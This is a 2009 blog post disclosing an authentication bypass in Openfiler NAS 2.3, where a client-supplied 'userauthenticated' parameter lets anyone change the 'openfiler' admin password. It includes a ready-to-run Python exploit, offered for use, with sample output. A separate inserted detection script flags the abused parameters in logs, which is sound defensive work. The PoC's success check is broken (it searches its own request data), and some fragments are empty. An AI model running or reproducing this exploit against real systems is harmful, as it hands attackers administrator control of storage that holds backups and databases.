Tuesday, February 3, 2009

Bug and exploit for OpenFiler 2.3

Everyone knows what a NAS is, and knows that it can store a lot of information that is critical for a company, such as workstation backups, databases and so on. What would happen if someone unauthorized could become the administrator of your NAS appliance?

The folks at OpenFiler never answered, so I am publishing this here:



Distro Release: Openfiler NAS/SAN Appliance 2.3
GUI Version: r1563-2-1


Openfiler takes the pain out of deploying and managing networked storage. You bring the hardware, any industry standard server will do, combine it with our Openfiler software and the result is a powerful networked storage solution that exports your data via a full suite of industry standard storage networking protocols. Openfiler lowers deployment and maintenance costs for networked storage without compromising functionality or performance.

Author: just a nonroot user

Vuln Type: register globals or something like that

Date: 2 weeks ago, no answer from devs.



[root@nas account]# pwd
[root@nas account]#

require("");
...
if ($GLOBALS["userauthenticated"] == 0)
{
    generic_header(array("title" => _("Your account")));
    dual_begin(array());

You can set userauthenticated via GET, so the client decides the outcome of this check.

and ...

form action="password.html" method="post"
...

You can set the variables in the form.

Then you can set the "openfiler" password to anything you like.
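
The parameter names in this post also work as a detection signature on the defending side. The following Python sketch is an added example, not part of the original post or of Openfiler: it flags access-log lines and form bodies that supply `userauthenticated`, `usercookie` or `passcookie`. The log lines are constructed, and the Common Log Format and the `/account/` index path are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names from the post that a client should never supply: they carry
# server-side authentication state.
STATE_PARAMS = {"userauthenticated", "usercookie", "passcookie"}

# Assumption: the web server writes Common Log Format lines.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def state_params_in(target, body=""):
    """Return the auth-state names found in the URL query or a form-encoded body."""
    names = set()
    for part in (urlsplit(target).query, body):
        names.update(parse_qs(part, keep_blank_values=True))
    return sorted(names & STATE_PARAMS)


def scan_access_log(lines):
    """Return (client, method, path, hits) for each line whose URL carries such names."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, target = m.groups()
        hits = state_params_in(target)
        if hits:
            findings.append((client, method, urlsplit(target).path, hits))
    return findings


# Constructed sample lines using documentation address ranges, not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2009:10:00:01 +0000] "GET /account/ HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Feb/2009:10:02:13 +0000] "GET /account/?userauthenticated=1 HTTP/1.1" 200 7340',
    '192.0.2.10 - - [03/Feb/2009:10:03:40 +0000] "POST /account/password.html HTTP/1.1" 200 2210',
    '198.51.100.7 - - [03/Feb/2009:10:04:02 +0000] "GET /account/password.html?userauthenticated=1&usercookie=openfiler HTTP/1.1" 200 2300',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so the POST line above passes unflagged; where request bodies are captured (a reverse proxy or WAF), pass them to `state_params_in` as `body`.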


You can exploit this with something like (PoC):

# Coded by
import urllib,sys,re
#host example:
host=raw_input("OpenFiler system ( include http and /): ")
#Super admin user
user='openfiler'
#What pass do you want?
password='nonroot'
#use it please ;)
fake="myladyastridcita"
data= urllib.urlencode({'current_password':fake , 'passcookie': fake, 'usercookie': user,'new_password': password,'confirm_new_password': password,'userauthenticated':"666"})
response= urllib.urlopen(host+"account/password.html", data)
print data
lookup=re.compile("successfully").search
match=lookup(data)
if match:
    print "Ok, now go and login with user:", user, " and password: ", password, " in ",host
else:
    print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
    sys.exit(2)
sys.exit(0)


use it:

nando:/home/nando# python
OpenFiler system ( include http and /):
Ok, now go and login with user: openfiler and password: nonroot in

That's all
